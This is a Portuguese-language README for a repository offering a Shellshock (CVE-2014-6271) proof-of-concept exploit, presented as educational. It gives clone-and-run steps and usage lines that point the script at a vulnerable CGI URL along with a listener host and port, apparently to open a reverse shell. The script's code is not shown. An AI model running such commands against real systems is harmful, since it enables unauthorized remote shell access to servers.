
Exploit do Shellshock (CVE-2014-6271)
Este repositório contém um exploit para uma vulnerabilidade que afeta sistemas baseados em Unix. Observe que este é meramente um script de prova de conceito criado para fins educacionais e deve ser usado com responsabilidade.
Este exploit foi projetado para demonstrar como o ataque shellshock funciona e como ele poderia ser usado para obter acesso ao shell de um sistema através de um cabeçalho de requisição maliciosamente criado.
Este repositório destina-se apenas a fins educacionais. Não use este código ou qualquer informação contida nele para fins maliciosos. Sempre siga as diretrizes éticas e respeite a lei.
Uso:
python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]
Exemplo:
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
Pré-requisitos:
Clone este repositório para sua máquina local.
git clone https://github.com/AlissonFaoli/Shellshock.git
Navegue até o diretório do projeto.
cd Shellshock
Execute o script shellshock.py.
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
Este exploit é lançado sob a Licença MIT. Você pode encontrar mais informações sobre isso no arquivo LICENSE.
Se você tiver alguma dúvida ou preocupação sobre este exploit, sinta-se à vontade para entrar em contato com o autor